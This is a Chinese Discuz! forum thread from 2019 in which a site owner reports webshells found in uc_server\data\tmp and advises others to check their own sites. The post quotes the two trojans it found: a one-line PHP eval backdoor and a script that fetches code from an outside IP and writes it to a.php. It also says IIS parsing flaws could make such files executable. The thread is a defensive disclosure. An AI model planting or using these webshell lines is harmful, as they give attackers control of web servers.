久久久久av_欧美日韩一区二区在线_国产精品三区四区_日韩中字在线

返回列表 發帖
查看: 5944|回復: 1

[求助] uc_server\data\tmp被上傳木馬文件 建議自查

15

主題

60

回帖

88

積分

漸入佳境

貢獻
0 點
金幣
9 個
樓主
發表于 2019-11-14 16:53:32 | 只看樓主 |只看大圖 |倒序瀏覽 |閱讀模式

今天網站搬家,順手用最新版的D盾掃描了一下,發現兩個可疑文件,圖片格式。

路徑為:uc_server\data\tmp

將格式圖片格式的后綴改為  .php,用記事本打開,發現一句話木馬,兩個文件分別如下:
  1. <?php @eval($_POST['1']);?>
復制代碼
  1. <script language="php"> $save=file_get_contents('http://103.198.194.134/php/xz.txt');  file_put_contents('a.php',$save) ;</script>
復制代碼
目前暫時沒掃出其他木馬,懷疑上傳木馬后并沒有成功執行。

文件名分別為:
upload37372
upload29060

后面的數字應該是用戶ID,建議將圖片改成隨機數字命名,否則容易被黑客利用。
IIS的解析漏洞,配合這個,有可能能拿下webshell。

-------建議大家自查一下。  不知道新版有木有這個漏洞,知道的大神說下。

我知道答案 回答被采納將會獲得1 貢獻 已有1人回答
回復

使用道具 舉報

15

主題

1868

回帖

2164

積分

應用開發者

discuz 老兵

貢獻
11 點
金幣
198 個
QQ
沙發
發表于 2019-11-14 17:43:13 | 只看Ta
這種情況一般都是頭像進來的, 做好防護措施  尤其服務器  廣告IIS有這個漏洞 包括  這個是PHP的漏洞
回復

使用道具 舉報

您需要登錄后才可以回帖 登錄 | 立即注冊

本版積分規則

  • 關注公眾號
  • 有償服務微信
  • 有償服務QQ

手機版|小黑屋|Discuz! 官方交流社區 ( 皖ICP備16010102號 |皖公網安備34010302002376號 )|網站地圖|star

GMT+8, 2025-9-18 18:06 , Processed in 0.068603 second(s), 31 queries .

Powered by Discuz! W1.0 Licensed

Copyright © 2001-2025 Discuz! Team.

關燈 在本版發帖
有償服務QQ
有償服務微信
返回頂部
快速回復 返回頂部 返回列表